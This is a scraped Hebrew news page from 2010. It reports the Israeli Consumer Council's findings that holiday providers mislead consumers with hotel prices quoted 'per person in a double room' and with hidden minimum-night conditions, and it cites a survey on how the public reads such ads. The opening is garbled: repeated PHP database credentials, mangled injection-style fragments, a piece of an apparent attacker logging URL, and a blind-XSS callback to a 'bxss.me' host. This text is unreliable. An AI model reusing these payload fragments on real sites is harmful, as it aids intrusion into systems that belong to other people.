$db_host = "1"; $db_user = "pHqghUme"; $db_pass = "g00dPa$$w0rD"; $db_name = "1"; ?> $db_host = "1"; $db_user = "pHqghUme"; $db_pass = "g00dPa$$w0rD"; $db_name = "1"; ?> $db_host = "1"; $db_user = "pHqghUme"; $db_pass = "g00dPa$$w0rD"; $db_name = "1"; ?> $db_host = "1"; $db_user = "pHqghUme"; $db_pass = "g00dPa$$w0rD"; $db_name = "1ySf9n9nO"; ?> $db_host = "1" $db_host = "1"; $db_user = "pHqghUme"; $db_pass = "g00dPa$$w0rD"; $db_name = "19342244"; ?> ?>acker-9434/log.php?"; ?>{acx}}%>"; ?> $db_pass = "g00dPa$$w0rD"; $db_name = "1"; ?> ?> $db_name = "1"; ?>b_pass = "g00dPa$$w0rD"; $db_name = "1"; ?> ?>>'hitvtgywpoinqc09d0.bxss.me')")"; $db_pass = "g00dPa$$w0rD"; $db_name = "1"; ?> ?> המועצה לצרכנות מצאה כי ספקי שירותי נופש מטעים את הציבור בפרסום מחירי שהייה בבתי מלון
x

דיווח על תקלה

תאור תקלה:
שם:
דואר אלקטרוני:
חיפוש באתר
מאמרים אחרונים

ספקי שירותי נופש מפרסמים מודעות העלולות להטעות צרכנים

תאריך: 07/09/2010 11:24   מחבר: מערכת האתר

המועצה לצרכנות החליטה לבדוק את הטענות שהופנו אליה בדבר הפרסומים המטעים לכאורה, בנוגע להשכרת חדר בבתי מלון. לצורך הבדיקה נערך תחקיר במסגרתו נאספו מודעות פרסומות שפורסמו בתאריכים  11.8-19.8/2010 בעיתונים  יומיים. במודעות הוצע לצרכן לרכוש לינה בבית מלון במחיר מסוים. בעקבות הפרסומים בוצעו שיחות טלפון למשרדי החברות על מנת לבדוק את המחיר הסופי של החדר ביחס למחיר שפורסם. כמו כן נבדק מחיר חדר באותו מלון  עבור אדם בודד.

ממצאי התחקיר העלו כי המחיר שמפורסם איננו המחיר הסופי אותו נדרש לשלם הצרכן. זאת לאור העובדה כי הסוכנויות מפרסמות מחיר חדרי מלון בנוסח " מחיר לאדם בחדר זוגי" או "מחיר לאדם בחדר". מכאן יכול הצרכן להבין בטעות כי המחיר מתייחס לאדם יחיד בעוד שבפועל מדובר על 2 אנשים לפחות. גם במקרים בהם צרכן בודד יבקש רק לעצמו חדר ללילה הוא לא יקבל את המחיר במודעה ויידרש לשלם מחיר כפול לעומת זה שפורסם.

עוד נמצא בתחקיר כי לפעמים הסוכנויות לא מפרסמות את העובדה שהמחיר הנקוב בפרסום מותנה בהזמנה של יותר מלילה אחד או מספר לילות מינימלי וכאשר הצרכן נדרש לשלם את סך העסקה בתום השהות רק אז מודיעים לו שהמחיר הנקוב בפרסום תקף אם הצרכן היה שוהה במלון יותר מלילה אחד.

לטענת המועצה מדובר בחשד להטעיית צרכנים בדבר המחיר האמיתי תוך הסתרה מכוונת של התנאים המהותיים בעסקה המשפיעים על המחיר הסופי של המוצר מבלי שהצרכן מודע להם בבואו להזמין ולשלם עבור חדר במלון, במקרה דנן.

סקר שערכה המועצה באמצעות מכון המחקר גיאוקרטוגרפיה בחודש אוגוסט 2010 , בדק כיצד נתפש המושג "מחיר לאדם בחדר זוגי" בעיני הצרכנים. תוצאות הסקר העלו כי  57% מהציבור לא מבין את המשמעות האמיתית והמעשית של הנוסח ואף טועה בהבנתו. על השאלה כיצד הייתם מעדיפים שהמחיר יפורסם, העדיפו 66% פרסום של מחיר ללילה לזוג בחדר זוגי, או מחיר כולל לחדר ללילה. רק  18% מהנשאלים העדיפו שהפרסום יישאר כפי שהוא.

לאור העולה בתחקיר סבורים במועצה לצרכנות כי בענף ספקי הנופש השתרשה נורמה של פרסום המאפשר להציג מחיר פיקטיבי נמוך מאוד אשר מסתיר את המחיר הגבוה בהרבה, שהוא המחיר האמיתי של העסקה.

מנכ"ל המועצה לצרכנות, עו"ד אהוד פלג מסר במסגרת הודעת המועצה לציבור כי ההגינות והחוק מחייבים הצגת מלוא המידע לצרכנים בדרך ברורה. כל ניסיון להתחכם ולהתחמק מקיום חובה זו, כמוהו כניסיון להשיג לקוחות בדרכים לא כשרות וראוי לגינוי ולביעור התופעה.

מנכ"ל המועצה ממליץ לצרכנים להתייחס בזהירות ובחשדנות לפרסומים על מחירי לינה, ולוודא במסגרת בדיקות הכדאיות וההשוואה שהם מבצעים בטרם קנייה, את המחיר האמיתי של ההצעות, בהתאם להזמנה שהם מבקשים לבצע בפועל ואת מספר הלילות המינימלי שהם ידרשו לרכוש.